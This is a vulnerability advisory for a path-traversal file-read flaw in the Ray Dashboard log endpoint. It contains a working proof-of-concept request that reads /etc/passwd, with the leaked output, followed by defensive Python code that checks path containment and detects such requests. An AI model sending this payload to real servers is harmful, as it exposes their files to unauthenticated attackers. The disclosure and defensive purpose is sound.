CVE-2023-6021: LFI in Ray API in ray

An LFI in the Ray Dashboard's log API endpoint (/api/v0/logs/file) allows an unauthenticated attacker to read any file on the server that the Dashboard process can read.

Description

Attackers can read any file on the system with the permissions of the user that started the Ray Dashboard.

Proof of Concept

GET /api/v0/logs/file?node_id=56424ecdb00cf570f0831aa698dd7c44e527a20212d2fa27078c7f79&filename=../../../../../etc%2fpasswd&lines=50000 HTTP/1.1
Host: localhost:8265
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/114.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://localhost:8265/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

HTTP/1.1 200 OK
Content-Type: text/plain
Date: Thu, 24 Aug 2023 21:49:54 GMT
Server: Python/3.8 aiohttp/3.8.5
Connection: close
Content-Length: 8225

1##
# User Database
# 
# Note that this file is consulted directly only when the system is running
# in single-user mode.  At other times this information is provided by
# Open Directory.
#
# See the opendirectoryd(8) man page for additional information about
# Open Directory.
##
nobody:*:-2:-2:Unprivileged User:/var/empty:/usr/bin/false
root:*:0:0:System Administrator:/var/root:/bin/sh
daemon:*:1:1:System Services:/var/root:/usr/bin/false
fakeuser:*:99:99:Fake User:/Users/danmcinerney/fakeuser:/bin/sh
_uucp:*:4:4:Unix to Unix Copy Protocol:/var/spool/uucp:/usr/sbin/uucico

Impact

Any unauthenticated client that can reach the Dashboard port (8265 by default, as in the PoC) can remotely read any file that the user who started Ray has permission to read. The Dashboard performs no authentication of its own, so network reachability is the only barrier.
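The PoC works because the filename query parameter is joined to the node's log directory and read back without checking that the resulting path still lies inside that directory; the framework percent-decodes the query string, so ../../../../../etc%2fpasswd arrives at the handler as ../../../../../etc/passwd. (The leading 1 in the response body is the status byte the streaming log endpoint prepends to its output, not part of /etc/passwd.) The following is an added example, not Ray's code and not the project's fix, showing the containment check such an endpoint needs and the same check applied to a raw request target so the PoC request can be flagged from an access log. The log root /var/log/ray, the function names, and the sample request targets are assumptions for illustration; the PoC target is copied from the request above.

```python
"""Containment check for a log-file endpoint (added example, not Ray's code).

Two pieces:
  resolve_log_path    - the check a handler should run before opening a file
  is_traversal_request - the same check applied to a raw request target, for
                         flagging requests like the PoC in access logs
"""
from pathlib import Path
from typing import Optional
from urllib.parse import parse_qs, urlsplit

# Assumed log directory for the example; not where Ray actually keeps logs.
LOG_ROOT = Path("/var/log/ray")

# Request target copied from the PoC request above (node_id, filename, lines).
POC_TARGET = (
    "/api/v0/logs/file"
    "?node_id=56424ecdb00cf570f0831aa698dd7c44e527a20212d2fa27078c7f79"
    "&filename=../../../../../etc%2fpasswd&lines=50000"
)


class PathTraversal(ValueError):
    """The requested filename resolves outside the log directory."""


def resolve_log_path(log_root: Path, filename: str) -> Path:
    """Return the on-disk path for `filename`, or raise PathTraversal.

    `filename` is taken as already percent-decoded (that is what an aiohttp
    handler sees), so it may contain literal '/' and '..' segments or even be
    absolute. Both sides are passed through resolve() so that '..' segments
    are collapsed and symlinks followed before the comparison; a symlink
    planted inside the log directory therefore cannot point outside it.
    """
    if not filename or "\x00" in filename:
        raise PathTraversal("empty or NUL-containing filename")
    root = log_root.resolve()
    # If `filename` is absolute, `root / filename` is just `filename`, which
    # the containment check below then rejects.
    candidate = (root / filename).resolve()
    # Require the resolved target to be strictly inside the root: the root
    # itself and anything outside it are both rejected.
    if root not in candidate.parents:
        raise PathTraversal(f"{filename!r} resolves to {candidate}, outside {root}")
    return candidate


def requested_filename(request_target: str) -> Optional[str]:
    """Extract the `filename` query parameter from a request target such as
    '/api/v0/logs/file?node_id=...&filename=...'. parse_qs percent-decodes
    values, so %2f comes back as '/'. Returns None for other endpoints or
    when the parameter is absent."""
    parts = urlsplit(request_target)
    if parts.path != "/api/v0/logs/file":
        return None
    values = parse_qs(parts.query).get("filename")
    return values[0] if values else None


def is_traversal_request(request_target: str, log_root: Path) -> bool:
    """Detection helper: True if the request would read outside `log_root`."""
    name = requested_filename(request_target)
    if name is None:
        return False
    try:
        resolve_log_path(log_root, name)
    except PathTraversal:
        return True
    return False


if __name__ == "__main__":
    # Constructed request targets: the PoC, an absolute-path variant, and a
    # benign request for a worker log inside the directory.
    for target in (
        POC_TARGET,
        "/api/v0/logs/file?node_id=abc&filename=%2Fetc%2Fpasswd",
        "/api/v0/logs/file?node_id=abc&filename=worker-1.out",
    ):
        print(is_traversal_request(target, LOG_ROOT), target)
```

Running the block prints True for the PoC target and the absolute-path variant and False for the benign worker log. The check is deliberately done on resolved paths rather than by rejecting the substring "..": a filename such as sub/../worker-1.out is harmless and should pass, while a symlink inside the log directory pointing at /etc must still be caught, and only comparison of resolved paths handles both cases.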

Related news

Critical Vulns Found in Ray Open Source Framework for AI/ML Workloads

Anyscale has dismissed the vulnerabilities as non-issues, according to researchers who reported the bugs to the company.

CVE-2023-48023: Ray, Versions 2.6.3, 2.8.0

Anyscale Ray 2.6.3 and 2.8.0 allow SSRF via /log_proxy. NOTE: the vendor's position is that this report is irrelevant because Ray, as stated in its documentation, is not intended for use outside of a strictly controlled network environment.
